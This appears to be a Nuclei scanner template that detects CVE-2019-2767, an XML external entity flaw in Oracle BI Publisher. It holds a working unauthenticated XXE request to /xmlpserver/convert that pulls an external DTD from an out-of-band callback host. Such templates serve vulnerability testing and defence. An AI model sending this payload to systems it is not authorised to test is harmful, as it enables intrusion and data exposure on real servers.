31 lines
1.2 KiB
YAML
31 lines
1.2 KiB
YAML
|
id: CVE-2019-2767
|
||
|
|
||
|
info:
|
||
|
name: Oracle Business Intelligence Publisher - XML External Entity Injection
|
||
|
author: madrobot
|
||
|
severity: high
|
||
|
description: Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.
|
||
|
reference:
|
||
|
- https://www.exploit-db.com/exploits/46729
|
||
|
- http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||
|
cvss-score: 7.2
|
||
|
cve-id: CVE-2019-2767
|
||
|
tags: edb,cve,cve2019,oracle,xxe,oast
|
||
|
|
||
|
http:
|
||
|
- raw:
|
||
|
- |
|
||
|
GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||
|
words:
|
||
|
- "http"
|
||
|
|
||
|
# Enhanced by mp on 2022/07/08
|